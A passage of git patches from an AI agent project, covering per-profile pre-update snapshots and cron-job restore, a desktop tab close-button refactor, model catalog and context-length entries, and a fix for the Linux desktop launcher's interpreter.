b/hermes_cli/update_cmd.py @@ -3230,6 +3230,11 @@ def _ensure_acp_launcher() -> None: print(f" ✓ Installed hermes-acp launcher → {acp_cmd}") _PRE_UPDATE_SNAPSHOT_KEEP = 1 +# Sibling-profile snapshot ids from the current run's pre-update backup +# ({profile: snapshot_id}) — consumed by the post-update per-profile +# cron-jobs safety net (#66140). Module-level because the snapshot and the +# restore run in the same process but far apart in _cmd_update_impl. +_LAST_SIBLING_SNAPSHOTS: dict = {} # Per-file size cap for the pre-update quick snapshot. Anything larger is # skipped with a warning: the snapshot exists to protect small, hard-to- @@ -3379,6 +3384,40 @@ def _run_pre_update_backup(args) -> Optional[str]: print() if snapshot_id: print(f"◆ Pre-update snapshot: {snapshot_id}") + + # #66140: the code swap + fleet restart touch EVERY profile, so + # every profile gets the same snapshot (same set, same 1GiB cap, + # keep=1) under its own state-snapshots/. Best-effort per profile. + try: + from hermes_cli.backup import create_pre_update_snapshots_all_profiles + + _sibling_snaps = create_pre_update_snapshots_all_profiles( + keep=_PRE_UPDATE_SNAPSHOT_KEEP, + max_file_size=_PRE_UPDATE_SNAPSHOT_MAX_FILE_SIZE, + ) + if _sibling_snaps: + print( + f"◆ Sibling profile snapshot(s): " + + ", ".join(sorted(_sibling_snaps)) + ) + try: + from hermes_cli.update_receipt import record_step + + record_step( + "sibling_profile_snapshots", + True, + ", ".join( + f"{k}={v}" for k, v in sorted(_sibling_snaps.items()) + ), + ) + except Exception: + pass + global _LAST_SIBLING_SNAPSHOTS + _LAST_SIBLING_SNAPSHOTS = _sibling_snaps + except Exception as _sib_exc: + logging.getLogger(__name__).debug( + "Sibling profile snapshots failed: %s", _sib_exc + ) except Exception as exc: # Never let a snapshot failure block an update. logging.getLogger(__name__).debug("Pre-update snapshot failed: %s", exc) @@ -6435,6 +6474,25 @@ def _cmd_update_impl(args, gateway_mode: bool): # Never let the cron safety net break an otherwise-good update. logger.debug("Cron jobs auto-restore check failed: %s", exc) + # #66140: run the same cron-jobs safety net for every sibling + # profile against ITS OWN pre-update snapshot (same-generation by + # construction — both taken by this run). + try: + from hermes_cli.backup import restore_cron_jobs_all_profiles + + for _restored in restore_cron_jobs_all_profiles( + _LAST_SIBLING_SNAPSHOTS + ): + print() + print( + f" ⚠️ Profile '{_restored['profile']}': cron/jobs.json " + f"lost jobs during this update — restored " + f"{_restored['job_count']} job(s) from pre-update " + f"snapshot {_restored['snapshot_id']}." + ) + except Exception as exc: + logger.debug("Sibling cron auto-restore check failed: %s", exc) + _print_update_summary( node_failures=node_failures, desktop_build_ok=desktop_build_ok, diff --git a/tests/hermes_cli/test_backup_all_profiles.py b/tests/hermes_cli/test_backup_all_profiles.py new file mode 100644 index 0000000000..aaebe442cd --- /dev/null +++ b/tests/hermes_cli/test_backup_all_profiles.py @@ -0,0 +1,129 @@ +"""Tests for the #66140 fix: pre-update snapshots cover every profile.""" + +import json +import re +from pathlib import Path + +import pytest + +import hermes_cli.backup as backup + + +def _mk_profile(home: Path, jobs: int = 0) -> Path: + home.mkdir(parents=True, exist_ok=True) + (home / "config.yaml").write_text("model: {}\n", encoding="utf-8") + if jobs: + cron = home / "cron" + cron.mkdir(exist_ok=True) + payload = {"jobs": [{"id": f"j{i}"} for i in range(jobs)]} + (cron / "jobs.json").write_text(json.dumps(payload), encoding="utf-8") + return home + + +@pytest.fixture() +def profiles(monkeypatch, tmp_path): + """default (invoking) + work + sparks profile homes.""" + default_home = _mk_profile(tmp_path / "home", jobs=3) + work = _mk_profile(tmp_path / "home" / "profiles" / "work", jobs=5) + sparks = _mk_profile(tmp_path / "home" / "profiles" / "sparks", jobs=0) + monkeypatch.setattr( + "hermes_cli.profiles._get_default_hermes_home", lambda: default_home + ) + monkeypatch.setattr( + "hermes_cli.profiles._get_profiles_root", lambda: tmp_path / "home" / "profiles" + ) + monkeypatch.setattr( + "hermes_cli.profiles._PROFILE_ID_RE", + re.compile(r"^[a-z0-9][a-z0-9_-]*$"), + raising=False, + ) + return {"default": default_home, "work": work, "sparks": sparks} + + +class TestSiblingEnumeration: + def test_excludes_invoking_profile(self, profiles): + names = [n for n, _ in backup._sibling_profile_homes(profiles["default"])] + assert names == ["sparks", "work"] + + def test_invoked_from_named_profile_includes_default(self, profiles): + names = [n for n, _ in backup._sibling_profile_homes(profiles["work"])] + assert names == ["default", "sparks"] + + def test_never_raises(self, monkeypatch, tmp_path): + def _boom(): + raise RuntimeError("no profiles module") + + monkeypatch.setattr("hermes_cli.profiles._get_default_hermes_home", _boom) + assert backup._sibling_profile_homes(tmp_path) == [] + + +class TestAllProfileSnapshots: + def test_each_sibling_snapshotted_into_own_home(self, profiles): + result = backup.create_pre_update_snapshots_all_profiles( + invoking_home=profiles["default"], keep=1 + ) + assert set(result) == {"work", "sparks"} + for name, snap_id in result.items(): + snap_dir = profiles[name] / "state-snapshots" / snap_id + assert snap_dir.is_dir() + assert (snap_dir / "config.yaml").is_file() + assert "pre-update" in snap_id + # invoking profile untouched by THIS call + assert not (profiles["default"] / "state-snapshots").exists() + + def test_size_cap_forwarded(self, profiles): + big = profiles["work"] / "state.db" + big.write_bytes(b"\x00" * 4096) + result = backup.create_pre_update_snapshots_all_profiles( + invoking_home=profiles["default"], keep=1, max_file_size=1024 + ) + snap_dir = profiles["work"] / "state-snapshots" / result["work"] + assert not (snap_dir / "state.db").exists() # capped out + assert (snap_dir / "config.yaml").is_file() # small files captured + + def test_one_failing_sibling_does_not_block_others(self, profiles, monkeypatch): + real = backup.create_quick_snapshot + + def _flaky(label=None, hermes_home=None, keep=None, max_file_size=None): + if hermes_home == profiles["work"]: + raise OSError("disk full") + return real( + label=label, hermes_home=hermes_home, keep=keep, + max_file_size=max_file_size, + ) + + monkeypatch.setattr(backup, "create_quick_snapshot", _flaky) + result = backup.create_pre_update_snapshots_all_profiles( + invoking_home=profiles["default"] + ) + assert "sparks" in result and "work" not in result + + +class TestPerProfileCronRestore: + def test_lost_jobs_restored_from_own_snapshot(self, profiles): + snaps = backup.create_pre_update_snapshots_all_profiles( + invoking_home=profiles["default"], keep=1 + ) + # simulate the migration emptying work's jobs.json + jobs_path = profiles["work"] / "cron" / "jobs.json" + jobs_path.write_text(json.dumps({"jobs": []}), encoding="utf-8") + + restored = backup.restore_cron_jobs_all_profiles( + snaps, invoking_home=profiles["default"] + ) + assert len(restored) == 1 + assert restored[0]["profile"] == "work" + assert restored[0]["job_count"] == 5 + live = json.loads(jobs_path.read_text(encoding="utf-8")) + assert len(live["jobs"]) == 5 + + def test_healthy_profiles_untouched(self, profiles): + snaps = backup.create_pre_update_snapshots_all_profiles( + invoking_home=profiles["default"], keep=1 + ) + assert backup.restore_cron_jobs_all_profiles( + snaps, invoking_home=profiles["default"] + ) == [] + + def test_empty_map_is_noop(self, profiles): + assert backup.restore_cron_jobs_all_profiles({}) == [] diff --git a/website/docs/getting-started/updating.md b/website/docs/getting-started/updating.md index aa8e9d9f58..0353e9540e 100644 --- a/website/docs/getting-started/updating.md +++ b/website/docs/getting-started/updating.md @@ -24,7 +24,7 @@ This pulls the latest code from `main`, updates dependencies, and prompts you to When you run `hermes update`, the following steps occur: -1. **Pre-update snapshot** — a lightweight state snapshot is saved by default (covers pairing data, cron jobs, `config.yaml`, `.env`, `auth.json`, and other state files that get modified at runtime; individual files over 1 GiB are skipped so a large sessions DB never slows the update down). Controlled by `updates.pre_update_backup` (`quick` by default, `full` for a zip of all of `HERMES_HOME`, `off` to disable). Recoverable via the snapshot restore flow described under [Snapshots and rollback](../user-guide/checkpoints-and-rollback.md). +1. **Pre-update snapshot** — a lightweight state snapshot is saved by default (covers pairing data, cron jobs, `config.yaml`, `.env`, `auth.json`, and other state files that get modified at runtime; individual files over 1 GiB are skipped so a large sessions DB never slows the update down). Because the code swap and gateway restarts touch every profile, the same snapshot is taken for **every profile** on the install — each into its own `state-snapshots/` directory — and the post-update cron-jobs safety net checks each profile against its own snapshot. Controlled by `updates.pre_update_backup` (`quick` by default, `full` for a zip of all of `HERMES_HOME`, `off` to disable). Recoverable via the snapshot restore flow described under [Snapshots and rollback](../user-guide/checkpoints-and-rollback.md). Quick snapshots are file-loss recovery, not code-rollback insurance — for a coherent point-in-time rollback use `--backup` (full mode). 2. **Git pull** — pulls the latest code from the `main` branch and updates submodules 3. **Post-pull syntax validation + auto-rollback** — after the pull, Hermes compiles the nine critical files every `hermes` invocation imports at startup. If any fails to parse (e.g. an orphan merge-conflict marker, an accidentally truncated file), Hermes runs `git reset --hard ` to roll the install back so your shell stays bootable. Re-run `hermes update` once the upstream fix lands. 4. **Dependency install** — runs `uv pip install -e ".[all]"` to pick up new or changed dependencies From 9815319d5fcdb537a36b5a88f18c88188f5401db Mon Sep 17 00:00:00 2001 From: ethernet Date: Fri, 21 Aug 2026 15:16:09 -0400 Subject: [PATCH 035/161] refactor(desktop): derive the tab hover close button from the close verb PaneTab gated its hover close button on two independent inputs: the onClose verb, and a showCloseButton prop that TreeGroup fed from a showCloseButton flag on the pane contribution. The middle-click and Meta-click gestures read only onClose. A tab could therefore close on a pointer gesture and advertise no control for it. The flag had no user that hideOnly did not already cover. Both setters also set hideOnly: true, which removes every close gesture: - the sessions pane (app/contrib/controller.tsx), - the Bots pane (plugins/hermes-bots/plugin.js). The flag was an opt-out marker with no reachable effect, so this change deletes it instead of teaching it to track the gestures. onClose alone now decides both shapes. A tab that closes shows the button. A tab without the verb shows nothing. To make a tab uncloseable, give it no close verb. hideOnly and uncloseable keep their meaning. They gate the verb, and both shapes follow the verb together. The DialogContent and SheetContent prop of the same name is a different prop and stays. It has no close verb to derive from, and one caller changes it while the dialog is open. Tests: the new tab-close-affordance test renders the real TreeGroup and asserts that button presence equals middle-click closure. It covers hideOnly chrome, a plain side pane, the uncloseable workspace, and a session tile. It reads closure from the layout tree, not from a spy, so a wired-up mock cannot pass it. A regression that hides the button on a closeable tab fails two of the four cases. The compiler rejects the deleted prop, so the test carries no fixture for it. The pane-tab unit test moves off the deleted prop. Verified with the full apps/desktop vitest suite, npm run typecheck, and npm run lint. Two electron process-spawn tests fail on this machine. They also fail on a clean tree, and they do not touch the pane shell. --- apps/desktop/src/app/contrib/controller.tsx | 1 - .../renderer/tab-close-affordance.test.tsx | 110 ++++++++++++++++++ .../pane-shell/tree/renderer/track-model.ts | 12 +- .../pane-shell/tree/renderer/tree-group.tsx | 1 - .../src/components/ui/pane-tab.test.tsx | 7 +- apps/desktop/src/components/ui/pane-tab.tsx | 10 +- .../desktop/src/plugins/hermes-bots/plugin.js | 2 +- 7 files changed, 126 insertions(+), 17 deletions(-) create mode 100644 apps/desktop/src/components/pane-shell/tree/renderer/tab-close-affordance.test.tsx diff --git a/apps/desktop/src/app/contrib/controller.tsx b/apps/desktop/src/app/contrib/controller.tsx index 05a0912dd9..79ba22d817 100644 --- a/apps/desktop/src/app/contrib/controller.tsx +++ b/apps/desktop/src/app/contrib/controller.tsx @@ -164,7 +164,6 @@ registry.registerMany([ collapsible: true, dock: { pane: 'workspace', pos: 'left' }, revealAliases: ['chat-sidebar'], - showCloseButton: false, // Standing chrome: no close gestures at all — the tab is shown/hidden // (zone menu Show/Hide rows + the auto-registered ⌘K toggle below). hideOnly: true, diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tab-close-affordance.test.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tab-close-affordance.test.tsx new file mode 100644 index 0000000000..cfecf78847 --- /dev/null +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tab-close-affordance.test.tsx @@ -0,0 +1,110 @@ +import { cleanup, fireEvent, render } from '@testing-library/react' +import { afterEach, beforeAll, beforeEach, describe, expect, it, vi } from 'vitest' + +import { registry } from '@/contrib/registry' + +import { allPaneIds, group, split } from '../model' +import { $layoutTree } from '../store' + +import { TreeGroup } from './tree-group' + +// The hover ✕ and middle-click are ONE affordance in two shapes: whichever tabs +// the pointer gesture can close must advertise it. A tab that closes on +// middle-click but hides its ✕ is a close verb the user cannot discover, and a +// tab that shows a ✕ it will not honor is a dead control. This asserts the +// equivalence over every tab kind the app registers, so the ✕ can never be +// wired (or un-wired) on its own again. + +class TestResizeObserver { + observe() {} + unobserve() {} + disconnect() {} +} + +beforeAll(() => { + vi.stubGlobal('ResizeObserver', TestResizeObserver) + // jsdom lacks CSS.escape, which tab-strip-scroll uses in a layout effect. + vi.stubGlobal('CSS', { ...globalThis.CSS, escape: (value: string) => value }) + Element.prototype.hasPointerCapture ??= () => false + Element.prototype.setPointerCapture ??= () => undefined + Element.prototype.releasePointerCapture ??= () => undefined + HTMLElement.prototype.scrollIntoView ??= () => undefined +}) + +const disposers: (() => void)[] = [] + +/** Every tab kind that shares a strip, paired with what its chrome declares. */ +const PANES: readonly (readonly [string, Record])[] = [ + // Standing chrome: no close gesture of any kind. + ['sessions', { hideOnly: true, placement: 'left' }], + // A plain side pane: closes, so it must say so. + ['files', { placement: 'right' }], + // The one surface that cannot leave the tree. + ['workspace', { placement: 'main', uncloseable: true }], + // A mirrored session tile — `placement: 'main'` but closeable. + ['session-tile:abc', { placement: 'main' }] +] + +beforeEach(async () => { + window.localStorage.clear() + + const { $dismissedPanes, $hiddenTreePanes } = await import('../store') + $dismissedPanes.set(new Set()) + $hiddenTreePanes.set(new Set()) + + for (const [id, data] of PANES) { + disposers.push(registry.register({ area: 'panes', data, id, render: () => null, title: id })) + } +}) + +afterEach(() => { + cleanup() + disposers.splice(0).forEach(dispose => dispose()) +}) + +/** All four panes in ONE zone, so every tab renders in the same strip. */ +function renderOneStrip() { + $layoutTree.set( + split('row', [ + group( + PANES.map(([id]) => id), + { active: 'workspace', id: 'grp-all' } + ), + group(['spacer'], { id: 'grp-spacer' }) + ]) + ) + + const node = $layoutTree.get()! + const zone = (node.type === 'split' ? node.children[0] : node) as never + + render() +} + +const tabEl = (paneId: string) => document.querySelector(`[data-tree-tab="${paneId}"]`) + +/** Does this tab advertise a ✕? */ +const hasCloseButton = (paneId: string) => Boolean(tabEl(paneId)?.querySelector('button[aria-label]')) + +/** Does the middle-click gesture actually close this tab? Observed through the + * tree, not through a spy — a pane that is gone stopped being a tab. */ +function middleClickCloses(paneId: string): boolean { + const tab = tabEl(paneId)! + fireEvent.pointerDown(tab, { button: 1 }) + fireEvent.pointerUp(tab, { button: 1 }) + + return !allPaneIds($layoutTree.get()!).includes(paneId) +} + +describe('a tab advertises exactly the close gesture it honors', () => { + for (const [paneId] of PANES) { + it(`${paneId}: ✕ presence matches middle-click`, () => { + renderOneStrip() + + expect(tabEl(paneId)).toBeTruthy() + + const advertised = hasCloseButton(paneId) + + expect(advertised).toBe(middleClickCloses(paneId)) + }) + } +}) diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts b/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts index 565c613e32..268dbb4b56 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts +++ b/apps/desktop/src/components/pane-shell/tree/renderer/track-model.ts @@ -64,12 +64,12 @@ interface PaneChrome extends PaneSizing { /** No Close in the tab menu — the one surface the app can't lose (the * main workspace). Session tiles share `placement: 'main'` but close. */ uncloseable?: boolean - /** Hide the hover ✕ while retaining explicit close behavior for this pane. */ - showCloseButton?: boolean - /** Standing chrome tab (sessions / Bots) whose tab shows NO ✕ and no Close - * verbs — it is shown/hidden instead (the zone menu's Show/Hide rows and a - * ⌘K toggle, via `setStripTabHidden`). Close was too destructive for these: - * an accidental ✕ removed Bot Mode until the next launch. */ + /** Standing chrome tab (sessions / Bots) with NO close verb at all: no ✕, + * no middle / ⌘-click, no Close menu rows. It is shown/hidden instead (the + * zone menu's Show/Hide rows and a ⌘K toggle, via `setStripTabHidden`). + * Close was too destructive for these: an accidental ✕ removed Bot Mode + * until the next launch. The ✕ follows the verb (see `PaneTab.onClose`), + * so dropping the verb here is what takes the chip off the tab. */ hideOnly?: boolean /** Wrap this pane's TAB (e.g. in a domain context menu — a session tile's * pin/branch/rename/archive/delete). The wrapper must render `tab` as its diff --git a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx index fa5fca4e51..bc1e7b90ef 100644 --- a/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx +++ b/apps/desktop/src/components/pane-shell/tree/renderer/tree-group.tsx @@ -556,7 +556,6 @@ export function TreeGroup({ }} role="tab" selected={isSelected} - showCloseButton={chrome.showCloseButton !== false} style={{ cursor: 'grab' }} > {chrome.tabLead ? ( diff --git a/apps/desktop/src/components/ui/pane-tab.test.tsx b/apps/desktop/src/components/ui/pane-tab.test.tsx index 2ada280145..bdd275497a 100644 --- a/apps/desktop/src/components/ui/pane-tab.test.tsx +++ b/apps/desktop/src/components/ui/pane-tab.test.tsx @@ -124,15 +124,16 @@ describe('PaneTab hover close button', () => { expect(screen.queryByRole('button', { name: 'Close' })).toBeNull() }) - it('can hide the hover ✕ while retaining the close handler', () => { + it('a closeable horizontal tab always shows its ✕ — the chip and the pointer gestures are one affordance', () => { const onClose = vi.fn() render( - + tab ) - expect(screen.queryByRole('button', { name: 'Close' })).toBeNull() + expect(screen.getByRole('button', { name: 'Close' })).toBeTruthy() + const tab = screen.getByText('tab') fireEvent.pointerDown(tab, { button: 1 }) fireEvent.pointerUp(tab, { button: 1 }) diff --git a/apps/desktop/src/components/ui/pane-tab.tsx b/apps/desktop/src/components/ui/pane-tab.tsx index c08e98d10b..dbf9fab10e 100644 --- a/apps/desktop/src/components/ui/pane-tab.tsx +++ b/apps/desktop/src/components/ui/pane-tab.tsx @@ -53,13 +53,14 @@ interface PaneTabProps extends React.ComponentProps<'div'> { dirty?: boolean /** Close verb. Horizontal tabs reveal a hover ✕ on the right (a `--tab-face` * gradient fades it over the label); middle-click and ⌘-click always work, - * and stay the only gestures on vertical rails (no room for a chip ✕). */ + * and stay the only gestures on vertical rails (no room for a chip ✕). + * There is no way to take the ✕ off a tab that HAS this verb: the chip and + * the pointer gestures are one affordance, so a closeable tab always says + * so. Omit `onClose` to make a tab uncloseable. */ onClose?: () => void /** Part of a multi-tab selection (⌥/Ctrl-click, Shift-click) — an accent * wash marks every tab that a drag would carry, Chrome-style. */ selected?: boolean - /** Whether a closeable horizontal tab reveals the hover ✕. */ - showCloseButton?: boolean /** Vertical rail form (collapsed sidebar zones). */ vertical?: boolean /** Content-facing edge of a vertical rail — the strip line the active tab cuts. */ @@ -83,7 +84,6 @@ export const PaneTab = React.forwardRef(function P onPointerUp, onClickCapture, selected = false, - showCloseButton = true, vertical = false, side = 'left', children, @@ -162,7 +162,7 @@ export const PaneTab = React.forwardRef(function P )} - {onClose && showCloseButton && !vertical && ( + {onClose && !vertical && ( // Hover ✕, painted OVER the label's right edge as an overlay (no // layout shift, tab width never jumps on hover). The runway is a tiny // transparent→`--tab-face` gradient, so the button melts into the diff --git a/apps/desktop/src/plugins/hermes-bots/plugin.js b/apps/desktop/src/plugins/hermes-bots/plugin.js index 07b3df6e54..3fe2c4eb7e 100644 --- a/apps/desktop/src/plugins/hermes-bots/plugin.js +++ b/apps/desktop/src/plugins/hermes-bots/plugin.js @@ -11857,7 +11857,7 @@ export default { // sessions pane collapses alone without this flag. The zone then keeps // a stranded BOTS tab on screen. The narrow edge overlay mirrors the // zone's tab strip, so the pane stays reachable while collapsed. - data: { placement: 'left', width: '260px', collapsible: true, showCloseButton: false, hideOnly: true, dock: { pane: 'sessions', pos: 'center', enforce: true } }, + data: { placement: 'left', width: '260px', collapsible: true, hideOnly: true, dock: { pane: 'sessions', pos: 'center', enforce: true } }, render: () => jsx(BotsPane, {}) }) From 67af79d7e1bd8264119c2f02b37a2a0686008666 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 12:49:13 -0700 Subject: [PATCH 036/161] feat(models): stealth/ox-alpha free model in the Nous Portal catalog MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Third surface for the Ox Alpha stealth reasoning model (after the OpenCode Zen rollout in #91250 and the OpenRouter listing in #91284). Adds stealth/ox-alpha to the curated Nous list and regenerates the docs manifest. Free on the portal ($0/$0), 1M context, 131K max output — verified against the live inference-api.nousresearch.com/v1/models. Provider-agnostic metadata already resolves via the bare ox-alpha slug (DEFAULT_CONTEXT_LENGTHS 1,048,576; reasoning_timeouts 300s floor), and the nous route bills via official_models_api, so no pricing snapshot is needed. --- hermes_cli/models.py | 5 +++++ website/static/api/model-catalog.json | 5 ++++- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/hermes_cli/models.py b/hermes_cli/models.py index e97c6cdf8a..d607a63a7b 100644 --- a/hermes_cli/models.py +++ b/hermes_cli/models.py @@ -306,6 +306,11 @@ _PROVIDER_MODELS: dict[str, list[str]] = { "nvidia/nemotron-3-super-120b-a12b", # Sakana "sakana/fugu-ultra", + # Stealth — "Ox Alpha" reasoning model, free ($0/$0 on the portal), + # 1M ctx / 131K max output. Same model as OpenCode Zen's + # x-preview-f-free; metadata entries live under the bare "ox-alpha" + # slug (model_metadata.py / reasoning_timeouts.py). + "stealth/ox-alpha", ], # Native OpenAI Chat Completions (api.openai.com). Used by /model counts and # provider_model_ids fallback when /v1/models is unavailable. diff --git a/website/static/api/model-catalog.json b/website/static/api/model-catalog.json index 231b0dcb08..f824a0b89a 100644 --- a/website/static/api/model-catalog.json +++ b/website/static/api/model-catalog.json @@ -1,6 +1,6 @@ { "version": 1, - "updated_at": "2026-08-21T11:29:05Z", + "updated_at": "2026-08-21T19:47:17Z", "metadata": { "source": "hermes-agent repo", "docs": "https://hermes-agent.nousresearch.com/docs/reference/model-catalog" @@ -286,6 +286,9 @@ }, { "id": "sakana/fugu-ultra" + }, + { + "id": "stealth/ox-alpha" } ] } From f8e5949f61f2b519ff1b937ff3d6f745a11327b9 Mon Sep 17 00:00:00 2001 From: unsupportedpastels Date: Thu, 20 Aug 2026 05:01:55 +0000 Subject: [PATCH 037/161] fix(model_metadata): add Daybreak Codex 900K context --- agent/model_metadata.py | 2 ++ tests/agent/test_model_metadata.py | 6 ++++-- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/agent/model_metadata.py b/agent/model_metadata.py index 8a8a4bee26..3571a56469 100644 --- a/agent/model_metadata.py +++ b/agent/model_metadata.py @@ -2395,6 +2395,7 @@ _CODEX_OAUTH_CONTEXT_FALLBACK: Dict[str, int] = { "gpt-5.6-sol": 272_000, "gpt-5.6-terra": 272_000, "gpt-5.6-luna": 272_000, + "gpt-daybreak-blue-latest": 272_000, "gpt-5.5": 272_000, "gpt-5.4": 272_000, "gpt-5.2": 272_000, @@ -2428,6 +2429,7 @@ _CODEX_OAUTH_VERIFIED_ABOVE_ADVERTISED_PREFIXES: Dict[str, int] = { } _CODEX_OAUTH_VERIFIED_ABOVE_ADVERTISED_EXACT: Dict[str, int] = { "gpt-5.4": 900_000, # verified live at 900K; gpt-5.4-mini rejected 500K — excluded + "gpt-daybreak-blue-latest": 900_000, # exact Daybreak/Sol alias verified at 911,276 } # The advertised value the verified-above table is allowed to override. diff --git a/tests/agent/test_model_metadata.py b/tests/agent/test_model_metadata.py index 1760516d2d..1d589355ca 100644 --- a/tests/agent/test_model_metadata.py +++ b/tests/agent/test_model_metadata.py @@ -518,6 +518,7 @@ class TestCodexOAuthContextLength: "gpt-5.6-luna", "gpt-5.6-sol-2026-07-09", # dated snapshot via gpt-5.6 family prefix "gpt-5.4", + "gpt-daybreak-blue-latest", # Sol alias; exact verified slug ], ) def test_stale_272k_advertisement_bumped_to_live_verified_900k(self, slug): @@ -590,7 +591,8 @@ class TestCodexOAuthContextLength: ) assert ctx == 272_000 - def test_fallback_table_resolution_also_bumped(self): + @pytest.mark.parametrize("slug", ["gpt-5.6-sol", "gpt-daybreak-blue-latest"]) + def test_fallback_table_resolution_also_bumped(self, slug): """When the live probe fails, the 272K fallback-table value for a verified slug is bumped the same way (same enforcement applies).""" from agent.model_metadata import get_model_context_length @@ -602,7 +604,7 @@ class TestCodexOAuthContextLength: patch("agent.model_metadata.get_cached_context_length", return_value=None), \ patch("agent.model_metadata.save_context_length"): ctx = get_model_context_length( - model="gpt-5.6-sol", + model=slug, base_url="https://chatgpt.com/backend-api/codex", api_key="expired-token", provider="openai-codex", From ac8dff4fbcf47a392a3cddcbec068aa05930ab47 Mon Sep 17 00:00:00 2001 From: unsupportedpastels Date: Fri, 21 Aug 2026 00:09:13 +0000 Subject: [PATCH 038/161] fix(compression): auto-raise Daybreak Codex threshold --- agent/auxiliary_client.py | 8 ++++++-- tests/agent/test_arcee_trinity_overrides.py | 7 ++++++- 2 files changed, 12 insertions(+), 3 deletions(-) diff --git a/agent/auxiliary_client.py b/agent/auxiliary_client.py index a069629e44..551341e9a6 100644 --- a/agent/auxiliary_client.py +++ b/agent/auxiliary_client.py @@ -671,7 +671,9 @@ def _is_codex_gpt54_or_gpt55(model: Optional[str], provider: Optional[str] = Non via prefix so the override tracks every 272K-capped family (5.4, 5.5, 5.6 sol/terra/luna incl. their ``-pro`` modes) without re-listing every variant. (Name kept for backward compatibility with the - ``compression.codex_gpt55_autoraise`` config key.) + ``compression.codex_gpt55_autoraise`` config key.) The exact + ``gpt-daybreak-blue-latest`` Codex slug is also a verified Sol-family + alias and receives the same autoraise. """ prov = (provider or "").strip().lower() if prov != "openai-codex": @@ -687,6 +689,7 @@ def _is_codex_gpt54_or_gpt55(model: Optional[str], provider: Optional[str] = Non or bare == "gpt-5.6" or bare.startswith("gpt-5.6-") or bare.startswith("gpt-5.6.") + or bare == "gpt-daybreak-blue-latest" ) @@ -741,7 +744,8 @@ def _compression_threshold_for_model( Per-model/route overrides: - Arcee Trinity Large Thinking → 0.75 (preserve reasoning context). - - gpt-5.4 / gpt-5.5 / gpt-5.6 on the Codex OAuth route → 0.85, because + - gpt-5.4 / gpt-5.5 / gpt-5.6 and the exact Daybreak Sol alias on the + Codex OAuth route → 0.85, because Codex caps all three families at 272K and the default 50% trigger would compact at ~136K. Gated by ``allow_codex_gpt55_autoraise`` (historical config-key name kept for backward compatibility) so the diff --git a/tests/agent/test_arcee_trinity_overrides.py b/tests/agent/test_arcee_trinity_overrides.py index 562674527c..63e6bbc161 100644 --- a/tests/agent/test_arcee_trinity_overrides.py +++ b/tests/agent/test_arcee_trinity_overrides.py @@ -74,7 +74,10 @@ def test_compression_threshold_default_none_for_other_models() -> None: @pytest.mark.parametrize( "model", - ["gpt-5", "gpt-5.55", "gpt-5.50", "gpt-5.45", "gpt-5.40", "", None], + [ + "gpt-5", "gpt-5.55", "gpt-5.50", "gpt-5.45", "gpt-5.40", + "gpt-daybreak-blue-latest-mini", "", None, + ], ) def test_is_codex_gpt54_or_gpt55_rejects_non_54_55_models(model) -> None: # Close numeric neighbours must NOT match — the prefix guards require a @@ -89,6 +92,8 @@ def test_compression_threshold_for_codex_gpt55() -> None: assert _compression_threshold_for_model("gpt-5.5", "openai-codex") == 0.85 assert _compression_threshold_for_model("gpt-5.5-pro", "openai-codex") == 0.85 assert _compression_threshold_for_model("openai/gpt-5.5", "openai-codex") == 0.85 + assert _is_codex_gpt54_or_gpt55("gpt-daybreak-blue-latest", "openai-codex") is True + assert _compression_threshold_for_model("gpt-daybreak-blue-latest", "openai-codex") == 0.85 From d9d967e07ab24c4f06c00ce67f53b6f88ef94064 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Wed, 19 Aug 2026 21:04:34 -0700 Subject: [PATCH 039/161] fix(cli): Linux hermes.desktop entry launches instead of silently dying on system python (#90292) resolve_exec_command wrote the repo hermes script (env-python shebang) straight into Exec=; spawned by the DE that shebang escapes the venv and dies on the first import, invisibly (Terminal=false, entry rewritten every launch). A python-script launcher whose shebang points outside the running interpreter's env now gets Exec={sys.executable} {script} desktop; native binaries, bash wrappers, and venv-shebang scripts are untouched. --- hermes_cli/linux_desktop_entry.py | 38 +++++++++++- tests/hermes_cli/test_linux_desktop_entry.py | 61 ++++++++++++++++++++ 2 files changed, 98 insertions(+), 1 deletion(-) diff --git a/hermes_cli/linux_desktop_entry.py b/hermes_cli/linux_desktop_entry.py index 2558102e62..a813702a25 100644 --- a/hermes_cli/linux_desktop_entry.py +++ b/hermes_cli/linux_desktop_entry.py @@ -68,12 +68,48 @@ def resolve_exec_command() -> str: bin_path = resolve_hermes_bin() if bin_path: - argv = [str(Path(bin_path).resolve()), "desktop"] + resolved = Path(bin_path).resolve() + if _needs_interpreter(resolved): + # The resolved launcher is a Python script whose shebang points at + # a NON-venv interpreter (e.g. the repo's `hermes` script with + # `#!/usr/bin/env python3` when argv[0] came from the shell + # installer's bash wrapper). Launched from the .desktop entry that + # shebang resolves to the SYSTEM python and dies on the first + # third-party import (#90292) — silently, since Terminal=false. + # sys.executable is the interpreter actually running Hermes (the + # venv one), so prefix it explicitly. + argv = [str(Path(sys.executable).resolve()), str(resolved), "desktop"] + else: + argv = [str(resolved), "desktop"] else: argv = [str(Path(sys.executable).resolve()), "-m", "hermes_cli.main", "desktop"] return " ".join(_quote_exec_arg(a) for a in argv) +def _needs_interpreter(bin_path: Path) -> bool: + """Whether ``bin_path`` is a Python script that must run under + ``sys.executable`` to see Hermes' venv (rather than its own shebang).""" + try: + with open(bin_path, "rb") as fh: + head = fh.readline(256) + except OSError: + return False + if not head.startswith(b"#!"): + # Native binary (uv tool shim, PyInstaller, distro package) — its own + # loader is self-sufficient. + return False + shebang = head.decode("utf-8", errors="replace").strip().lower() + if "python" not in shebang: + # A shell wrapper (e.g. the installer's bash launcher) execs the venv + # python itself — leave it alone. + return False + # A python shebang pointing INSIDE the running interpreter's environment + # already resolves correctly; anything else (``/usr/bin/env 